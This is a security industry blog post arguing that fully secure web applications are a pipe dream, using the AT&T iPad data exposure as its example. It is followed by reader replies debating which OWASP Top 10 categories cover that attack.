We security folks are a tough crowd, and we have trouble understanding why stuff that is obvious to us isn’t so obvious to everyone else. We wonder why app developers can’t understand how to develop a secure application. Why can’t they grok SDL or run a damn scanner against the application before it goes live? Q/A? Ha. Obviously that’s for losers. And those sentiments aren’t totally misplaced. There is a tremendous amount of apathy regarding software security, and the incentives for developers to do it right just aren’t there.
But it’s not all the developers fault, because for the most part secure coding is a dream. Yeah, maybe that’s harsh and I’m sure the tool vendors will be hanging me in effigy soon enough, but that’s how it seems to me. Says the guy who hasn’t developed real code for 18+ years and leaves the application security research to folks (like Adrian) who are qualified to have an opinion. But not being qualified never stopped me from having an opinion before.
I come to this conclusion after spending some time trying to digest a post by Errata Security’s Rob Graham on the AT&T iPad hack. Rob goes through quite a few application security no-nos, quoting chapter and verse, pointing them out in this rather simple attack.
This specific attack vector doesn’t appear in the OWASP Top 10 list, nor should it. But it underscores the difficulty of really securing an application and the need to not just run a scanner against the code, but to really exercise the business logic before turning the app loose on the world.
Rob’s post talks about information leakage, security via obscurity, the blurring line between internal and external, and other ways to make an application do unintended things, usually ending in some kind of successful attack.
So does that mean we give up, which seemed to be one of the messages from the Gartner show this week (hat tip to Ed at Securitycurve)? Not so much, but we have to continue aggressively managing expectations. If you have smart guys like Rob, RSnake, or Jeremiah beat the crap out of your application, they will find problems. Then you’ll have an opportunity to fix them before the launch. In a perfect world, this is exactly what you would do, but it certainly isn’t the cheapest or fastest option.
On the other hand, you can run a scanner against the code and eliminate much of the lowest-hanging fruit that the script kiddies would target. That’s certainly an option, but the key to this approach is to make sure everyone knows a talented attacker specifically targeting your stuff will win. So when an attack not explicitly mentioned in your threat model (like the AT&T/iPad attack) happens, you will have to deal with it. And if you have some buddies in the FBI, maybe you can even get the hacker arrested on drug charges…
Or you could do nothing like most of the world, and seem surprised when a 12-year-old in Estonia sells your customers on a grey-market website.
To think we can really develop secure web applications is probably a pipe dream – depending on our definition of ‘secure’, obviously. But we certainly can make our apps more secure and outrun our slower competitors, if not the bear. Most of the time that’s enough.
Reader interactions
6 Replies to “Are Secure Web Apps Possible?”
@ 401k – Front tire blew, rim hit expansion joint, car became Frisbee. I was an unwilling 360 degree observer. Sure, I was a participant, but one without any semblance of input or control.
-Adrian
Lol. Jeremiah Grossman doesn’t do pen-testing!
There are many ways to prevent security bugs just like regular bugs. Most orgs today spend too much time doing nothing — or the bare minimum.
If you want rigorous protection or assurance then build some rigor into your development around appsec!
@Adrian: Your CAR flipped off the road. You didnt FLIP the car, it just flipped on its own? Must have been like “a car hit a tree, injuring driver and occupants” sort of thing. The driver didnt do it, the car did.
Adrian hits on a key point. Another is that to not take reasonable efforts at minimizing foreseeable weaknesses is negligent behavior, which can (and increasingly does) put the organization in legal jeopardy. Doing nothing is not legally defensible unless a decision process is documented that shows a full and valid analysis of that decision.
As for OWASP Top 10, you’re wrong that it doesn’t cover the AT&T break. It definitely falls under “A3: Broken Authentication and Session Management” and could also be construed to touch on “A4: Insecure Direct Object References” and “A6: Security Misconfiguration” and “A8: Failure to Restrict URL Access” (since I believe they said the URL wasn’t supposed to be exposed external to the mobile network). If you want to go even more in-depth, add in the CWE/SANS Top 25 just for kicks.
Good point. Bad example.
The fact is that the hack is *EXACTLY* A4 in the OWASP Top 10. So it really ought to be in in everyone’s threat model. But it’s not easy to scan for, so it’s often overlooked.
I think it’s different than what you describe. As an example, when my car flipped off the road last year, it happened in a way I could not imagine was even possible. I had trained and prepared for emergencies, but when it happened it was totally different what even what I could conceive